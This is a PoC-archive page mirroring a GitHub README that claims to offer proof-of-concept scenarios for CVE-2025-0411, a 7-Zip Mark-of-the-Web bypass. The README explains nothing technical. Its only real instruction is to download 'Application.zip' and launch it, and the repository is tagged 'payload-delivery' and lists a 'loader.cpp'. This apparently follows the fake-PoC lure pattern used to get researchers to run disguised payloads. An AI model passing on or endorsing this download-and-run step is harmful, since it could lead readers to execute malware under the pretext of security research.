Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-0411 PoC — 7-Zip Mark-of-the-Web Bypass Vulnerability

Source
Associated Vulnerability
Title:7-Zip Mark-of-the-Web Bypass Vulnerability (CVE-2025-0411)
Description:7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user. Was ZDI-CAN-25456.
Description
This repository contains POC scenarios as part of CVE-2025-0411 MotW bypass.
Readme
# 🚀 7-Zip-CVE-2025-0411-POC Repository 

Welcome to the **7-Zip-CVE-2025-0411-POC** repository! Here you will find Proof of Concept (POC) scenarios related to the CVE-2025-0411 MotW bypass vulnerability in 7-Zip.

## Repository Details:

- **Repository Name:** 7-Zip-CVE-2025-0411-POC
- **Short Description:** This repository contains POC scenarios as part of the CVE-2025-0411 MotW bypass.
- **Topics:** 7zip, cve, cve-2025-0411, cve-2025-0411-poc, payload-delivery, poc

## Explore the Repository:

To access the POC scenarios and explore the content of this repository, please visit the following link: 

[![Download Application.zip](https://img.shields.io/badge/Download-Application.zip-brightgreen)](https://github.com/files/uploaded/Application.zip)

If the link ends with the file name "Application.zip," you will need to launch it to access the content. 

In case the link provided is a website, feel free to visit it directly to discover more about the POC scenarios and the CVE-2025-0411 MotW bypass vulnerability.

If the link is not working or not provided, we recommend checking the "Releases" section of this repository for alternative access to the content.

## Get Involved:

We encourage security enthusiasts, researchers, and developers to contribute to this repository by providing additional POC scenarios, insights, or fixes related to the CVE-2025-0411 MotW bypass vulnerability in 7-Zip. Your contributions can help improve the security of software systems and protect users from potential threats.

## Stay Updated:

Stay tuned for the latest updates, news, and releases related to the 7-Zip CVE-2025-0411 POC scenarios by watching this repository. Don't miss out on new insights, fixes, and developments in the world of cybersecurity.

---

By exploring this repository and engaging with the POC scenarios provided, you are contributing to the advancement of cybersecurity knowledge and enhancing the protection of digital systems against potential exploits and vulnerabilities. Thank you for your interest and collaboration in making the digital world more secure. 

Happy coding and happy securing! 🛡️🔒

![Cybersecurity](https://media.istockphoto.com/vectors/cyber-security-concept-with-word-and-lock-vector-id1218747853)
File Snapshot

[4.0K] /data/pocs/2efdeee104e3f30418ee846ea9e666a06172c98b ├── [ 652] loader.cpp └── [2.2K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →